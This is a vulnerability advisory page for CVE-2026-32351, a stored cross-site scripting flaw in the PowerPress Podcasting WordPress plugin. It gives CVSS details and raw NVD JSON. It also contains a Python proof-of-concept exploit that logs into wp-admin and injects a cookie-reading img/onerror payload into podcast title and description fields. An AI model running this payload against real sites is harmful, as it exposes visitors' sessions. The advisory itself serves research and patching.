Security Vulnerability Report
中文
CVE-2026-32351 CVSS 5.9 MEDIUM

CVE-2026-32351

Published: 2026-03-13 19:54:47
Last Modified: 2026-04-22 21:30:26

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in blubrry PowerPress Podcasting powerpress allows Stored XSS.This issue affects PowerPress Podcasting: from n/a through <= 11.15.13.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

PowerPress Podcasting <= 11.15.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-32351 PoC - PowerPress Podcasting Stored XSS # Target: WordPress with PowerPress Plugin <= 11.15.13 TARGET_URL = "http://target-wordpress-site.com" USERNAME = "admin" PASSWORD = "password" XSS_PAYLOAD = '<img src=x onerror=alert(document.cookie)>' def exploit_stored_xss(): """ Exploitation steps: 1. Authenticate to WordPress admin panel 2. Navigate to PowerPress podcast settings 3. Inject XSS payload in podcast title/description field 4. Any user viewing the podcast page will trigger the payload """ session = requests.Session() # Step 1: Login to WordPress login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies: print("[-] Authentication failed") return False print("[+] Successfully authenticated") # Step 2: Access PowerPress settings powerpress_url = f"{TARGET_URL}/wp-admin/admin.php?page=powerpress/powerpressadmin_basic.php" response = session.get(powerpress_url) # Step 3: Inject XSS payload # Target field: podcast_title or podcast_description post_data = { 'powerpress[podcast_title]': f'Podcast Name{XSS_PAYLOAD}', 'powerpress[podcast_description]': f'Description with{XSS_PAYLOAD}', 'action': 'powerpress-save-settings', '_wpnonce': extract_nonce(response.text) } response = session.post(powerpress_url, data=post_data) if response.status_code == 200: print("[+] XSS payload injected successfully") print(f"[+] Payload stored at: {TARGET_URL}/podcast/feed/") return True return False def extract_nonce(page_content): """Extract WordPress nonce from page content""" import re nonce_pattern = r'_wpnonce=([a-z0-9]+)' match = re.search(nonce_pattern, page_content) return match.group(1) if match else None if __name__ == '__main__': print("CVE-2026-32351 PowerPress Stored XSS Exploit") print("=" * 50) exploit_stored_xss()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32351", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:47.123", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in blubrry PowerPress Podcasting powerpress allows Stored XSS.This issue affects PowerPress Podcasting: from n/a through <= 11.15.13."}, {"lang": "es", "value": "Vulnerabilidad de Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') en blubrry PowerPress Podcasting powerpress permite XSS Almacenado. Este problema afecta a PowerPress Podcasting: desde n/a hasta &lt;= 11.15.13."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.7, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/powerpress/vulnerability/wordpress-powerpress-podcasting-plugin-11-15-13-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}